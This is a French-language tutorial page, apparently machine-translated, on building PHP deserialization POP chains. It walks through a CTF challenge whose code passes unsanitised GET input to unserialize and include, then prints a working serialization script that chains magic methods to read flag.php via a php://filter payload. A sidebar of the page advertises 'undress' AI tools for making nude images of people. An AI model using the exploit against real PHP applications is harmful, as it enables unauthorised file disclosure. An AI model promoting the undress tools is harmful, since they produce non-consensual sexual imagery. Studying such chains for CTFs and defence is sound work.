Table des matières
Construction de chaîne pop
Introduction à la chaîne pop
Idées de construction
Explication de la chaîne pop
Maison développement back-end tutoriel php Introduction détaillée aux points de connaissance de la construction de chaînes pop de désérialisation PHP

Introduction détaillée aux points de connaissance de la construction de chaînes pop de désérialisation PHP

May 05, 2022 pm 06:42 PM
php

Cet article vous apporte des connaissances pertinentes sur PHP, qui présente principalement des problèmes liés à la construction de chaînes pop. La chaîne pop est une sorte de programmation orientée attributs, qui est couramment utilisée pour construire des chaînes d'appels. J'espère que cela aidera tout le monde.

Introduction détaillée aux points de connaissance de la construction de chaînes pop de désérialisation PHP

Apprentissage recommandé : "Tutoriel vidéo PHP"

Alors que nous continuons à en apprendre davantage sur la désérialisation, apprenons-en plus sur la structure de la chaîne pop. Cette chaîne pop est encore difficile à comprendre pour un novice comme moi. Je vais réécrire cet article pour la résumer et approfondir ma compréhension de la construction de chaînes pop. En même temps, cela permet également de comprendre les amis qui souhaitent rejoindre le piège.

Construction de chaîne pop

Problèmes généraux de désérialisation, là où il y a des failles ou où du code malveillant peut être injecté dans la méthode magique, nous pouvons obtenir l'effet d'attaque en appelant automatiquement la méthode magique. Mais lorsque le point d'injection existe dans une méthode de classe ordinaire, la méthode appelée automatiquement auparavant ne sera pas valide. Par conséquent, nous devons trouver le lien entre la classe ordinaire et la méthode magique, trouver une idée logique et utiliser cette idée logique pour. Construisez une chaîne pop pour atteindre le but de l'attaque. Par conséquent, lorsque nous répondons à ce genre de questions pop, nous devons prêter une attention particulière à la méthode magique.

Introduction à la chaîne pop

C'est une méthode de programmation orientée attributs qui est souvent utilisée pour construire des chaînes d'appels. Trouvez une série d'instructions qui peuvent être appelées dans le code de la question et intégrez ces instructions dans un code logique qui peut produire des effets d'attaque malveillants, qui est la chaîne pop (compréhension personnelle, les maîtres sont invités à donner leur avis) dans la construction du chaîne pop, les méthodes magiques sont essentielles. Ce qui suit utilisera un exemple pour expliquer comment la chaîne pop est construite, ainsi que les idées de construction spécifiques

Le code de la question :

Welcome to index.php
<?php
//flag is in flag.php
//WTF IS THIS?
//Learn From https://ctf.ieki.xyz/library/php.html#%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E9%AD%94%E6%9C%AF%E6%96%B9%E6%B3%95
//And Crack It!
class Modifier {
    protected  $var;
    public function append($value){
        include($value);
    }
    public function __invoke(){
        $this->append($this->var);
    }
}

class Show{
    public $source;
    public $str;
    public function __construct($file='index.php'){
        $this->source = $file;
        echo 'Welcome to '.$this->source."<br>";
    }
    public function __toString(){
        return $this->str->source;
    }

    public function __wakeup(){
        if(preg_match("/gopher|http|file|ftp|https|dict|\.\./i", $this->source)) {
            echo "hacker";
            $this->source = "index.php";
        }
    }
}

class Test{
    public $p;
    public function __construct(){
        $this->p = array();
    }

    public function __get($key){
        $function = $this->p;
        return $function();
    }
}

if(isset($_GET['pop'])){
    @unserialize($_GET['pop']);
}
else{
    $a=new Show;
    highlight_file(__FILE__);
}
Copier après la connexion

Idées de construction

Lors de la construction de la chaîne d'appel, trouvez d'abord la tête et la queue de l'appel. chaîne. L'en-tête est généralement un endroit où les paramètres peuvent être transmis et désérialisés, tandis que la queue est généralement un endroit où du code malveillant peut être exécuté. Lors de l'audit du code pour cette question, l'en-tête utilise la méthode get pour transmettre les paramètres à afficher, et la queue inclut la fonction include. À ce stade, nous devrions tous savoir que nous devons utiliser le pseudo-protocole PHP pour lire le code source du fichier flag. Maintenant que la tête et la queue sont trouvées, nous connaissons également la méthode d'attaque. Trouvez ensuite la méthode magique dans la question.

__invoke()    当一个类被当作函数执行时调用此方法。

__construct   在创建对象时调用此方法

__toString()  在一个类被当作字符串处理时调用此方法

__wakeup()    当反序列化恢复成对象时调用此方法

__get()       当读取不可访问或不存在的属性的值会被调用
Copier après la connexion

Il y a un total de ces cinq méthodes magiques dans la question. Trouvez ensuite le lien entre les classes ordinaires et les méthodes magiques.

Il n'est pas difficile de voir qu'il existe une fonction preg_match dans la fonction wakeup, qui est utilisée pour trouver des chaînes sensibles dans la source. Nous pouvons commencer à partir d'ici et attribuer la source à une classe show, puis la fonction toString sera. automatiquement déclenché, nous devons donc maintenant utiliser la méthode tostring. Pour étendre la chaîne, nous pouvons attribuer $this->str à la classe de test dans la méthode totring et lire la variable source dans la classe de test (car il n'y en a pas. source dans la classe de test, un attribut inaccessible est accessible.) Ensuite, il appellera automatiquement la méthode get magic. On peut constater qu'il y a un appel de fonction dans la méthode get, alors nous pouvons attribuer $this->p à la classe Modifier, et la méthode d'invocation sera automatiquement appelée pour exécuter le pseudo-protocole PHP que nous avons écrit (attribuez le var dans la classe Modifer de notre code malveillant)

À ce stade, nous construisons la chaîne pop.

Explication de la chaîne pop

<?php
class Modifier {
	protected $var=&#39;php://filter/read=convert.base64-encode/resource=flag.php&#39;;
}
class Show{
	public $source;
	public $str;
	function _construct(){
		$this->source=$file;
	}
}
class Test{
	public $p;
}
$a = new show();
$b = new show();
$c = new test();
$d = new Modifier();
$a->source=$b;
$b->str=$c;
$c->p= $d;
echo urlencode(serialize($a));
?>
Copier après la connexion

Écrivez d'abord les classes utilisées pour former un cadre, puis indiquez les variables dans les classes. Instanciez les classes utilisées séparément. Pourquoi devez-vous utiliser new show deux fois ? (Vous devriez pouvoir comprendre en regardant le code. La première fois consiste à instancier la classe show, et la deuxième fois, à instancier la classe show après. la première fois. source=show instancié pour la deuxième fois)

Essayez d'utiliser le codage d'url lorsque nous sérialisons (il y a des attributs modifiés protégés dans cette question, et il y aura des caractères invisibles)

Apprentissage recommandé : "Tutoriel vidéo PHP

Ce qui précède est le contenu détaillé de. pour plus d'informations, suivez d'autres articles connexes sur le site Web de PHP en chinois!

Déclaration de ce site Web
Le contenu de cet article est volontairement contribué par les internautes et les droits d'auteur appartiennent à l'auteur original. Ce site n'assume aucune responsabilité légale correspondante. Si vous trouvez un contenu suspecté de plagiat ou de contrefaçon, veuillez contacter admin@php.cn

Outils d'IA chauds

Undresser.AI Undress

Undresser.AI Undress

Application basée sur l'IA pour créer des photos de nu réalistes

AI Clothes Remover

AI Clothes Remover

Outil d'IA en ligne pour supprimer les vêtements des photos.

Undress AI Tool

Undress AI Tool

Images de déshabillage gratuites

Clothoff.io

Clothoff.io

Dissolvant de vêtements AI

Video Face Swap

Video Face Swap

Échangez les visages dans n'importe quelle vidéo sans effort grâce à notre outil d'échange de visage AI entièrement gratuit !

Outils chauds

Bloc-notes++7.3.1

Bloc-notes++7.3.1

Éditeur de code facile à utiliser et gratuit

SublimeText3 version chinoise

SublimeText3 version chinoise

Version chinoise, très simple à utiliser

Envoyer Studio 13.0.1

Envoyer Studio 13.0.1

Puissant environnement de développement intégré PHP

Dreamweaver CS6

Dreamweaver CS6

Outils de développement Web visuel

SublimeText3 version Mac

SublimeText3 version Mac

Logiciel d'édition de code au niveau de Dieu (SublimeText3)

Guide d'installation et de mise à niveau de PHP 8.4 pour Ubuntu et Debian Guide d'installation et de mise à niveau de PHP 8.4 pour Ubuntu et Debian Dec 24, 2024 pm 04:42 PM

PHP 8.4 apporte plusieurs nouvelles fonctionnalités, améliorations de sécurité et de performances avec une bonne quantité de dépréciations et de suppressions de fonctionnalités. Ce guide explique comment installer PHP 8.4 ou mettre à niveau vers PHP 8.4 sur Ubuntu, Debian ou leurs dérivés. Bien qu'il soit possible de compiler PHP à partir des sources, son installation à partir d'un référentiel APT comme expliqué ci-dessous est souvent plus rapide et plus sécurisée car ces référentiels fourniront les dernières corrections de bogues et mises à jour de sécurité à l'avenir.

7 fonctions PHP que je regrette de ne pas connaître auparavant 7 fonctions PHP que je regrette de ne pas connaître auparavant Nov 13, 2024 am 09:42 AM

Si vous êtes un développeur PHP expérimenté, vous aurez peut-être le sentiment d'y être déjà allé et de l'avoir déjà fait. Vous avez développé un nombre important d'applications, débogué des millions de lignes de code et peaufiné de nombreux scripts pour réaliser des opérations.

Comment configurer Visual Studio Code (VS Code) pour le développement PHP Comment configurer Visual Studio Code (VS Code) pour le développement PHP Dec 20, 2024 am 11:31 AM

Visual Studio Code, également connu sous le nom de VS Code, est un éditeur de code source gratuit – ou environnement de développement intégré (IDE) – disponible pour tous les principaux systèmes d'exploitation. Avec une large collection d'extensions pour de nombreux langages de programmation, VS Code peut être c

Expliquez les jetons Web JSON (JWT) et leur cas d'utilisation dans les API PHP. Expliquez les jetons Web JSON (JWT) et leur cas d'utilisation dans les API PHP. Apr 05, 2025 am 12:04 AM

JWT est une norme ouverte basée sur JSON, utilisée pour transmettre en toute sécurité des informations entre les parties, principalement pour l'authentification de l'identité et l'échange d'informations. 1. JWT se compose de trois parties: en-tête, charge utile et signature. 2. Le principe de travail de JWT comprend trois étapes: la génération de JWT, la vérification de la charge utile JWT et l'analyse. 3. Lorsque vous utilisez JWT pour l'authentification en PHP, JWT peut être généré et vérifié, et les informations sur le rôle et l'autorisation des utilisateurs peuvent être incluses dans l'utilisation avancée. 4. Les erreurs courantes incluent une défaillance de vérification de signature, l'expiration des jetons et la charge utile surdimensionnée. Les compétences de débogage incluent l'utilisation des outils de débogage et de l'exploitation forestière. 5. L'optimisation des performances et les meilleures pratiques incluent l'utilisation des algorithmes de signature appropriés, la définition des périodes de validité raisonnablement,

Comment analysez-vous et traitez-vous HTML / XML dans PHP? Comment analysez-vous et traitez-vous HTML / XML dans PHP? Feb 07, 2025 am 11:57 AM

Ce tutoriel montre comment traiter efficacement les documents XML à l'aide de PHP. XML (Language de balisage extensible) est un langage de balisage basé sur le texte polyvalent conçu à la fois pour la lisibilité humaine et l'analyse de la machine. Il est couramment utilisé pour le stockage de données et

Programme PHP pour compter les voyelles dans une chaîne Programme PHP pour compter les voyelles dans une chaîne Feb 07, 2025 pm 12:12 PM

Une chaîne est une séquence de caractères, y compris des lettres, des nombres et des symboles. Ce tutoriel apprendra à calculer le nombre de voyelles dans une chaîne donnée en PHP en utilisant différentes méthodes. Les voyelles en anglais sont a, e, i, o, u, et elles peuvent être en majuscules ou en minuscules. Qu'est-ce qu'une voyelle? Les voyelles sont des caractères alphabétiques qui représentent une prononciation spécifique. Il y a cinq voyelles en anglais, y compris les majuscules et les minuscules: a, e, i, o, u Exemple 1 Entrée: String = "TutorialSpoint" Sortie: 6 expliquer Les voyelles dans la chaîne "TutorialSpoint" sont u, o, i, a, o, i. Il y a 6 yuans au total

Expliquez la liaison statique tardive en PHP (statique: :). Expliquez la liaison statique tardive en PHP (statique: :). Apr 03, 2025 am 12:04 AM

Liaison statique (statique: :) ​​implémente la liaison statique tardive (LSB) dans PHP, permettant à des classes d'appel d'être référencées dans des contextes statiques plutôt que de définir des classes. 1) Le processus d'analyse est effectué au moment de l'exécution, 2) Recherchez la classe d'appel dans la relation de succession, 3) il peut apporter des frais généraux de performance.

Quelles sont les méthodes PHP Magic (__construct, __ destruct, __ call, __get, __set, etc.) et fournir des cas d'utilisation? Quelles sont les méthodes PHP Magic (__construct, __ destruct, __ call, __get, __set, etc.) et fournir des cas d'utilisation? Apr 03, 2025 am 12:03 AM

Quelles sont les méthodes magiques de PHP? Les méthodes magiques de PHP incluent: 1. \ _ \ _ Construct, utilisé pour initialiser les objets; 2. \ _ \ _ Destruct, utilisé pour nettoyer les ressources; 3. \ _ \ _ Appel, gérer les appels de méthode inexistants; 4. \ _ \ _ GET, Implémentez l'accès à l'attribut dynamique; 5. \ _ \ _ SET, Implémentez les paramètres d'attribut dynamique. Ces méthodes sont automatiquement appelées dans certaines situations, améliorant la flexibilité et l'efficacité du code.

See all articles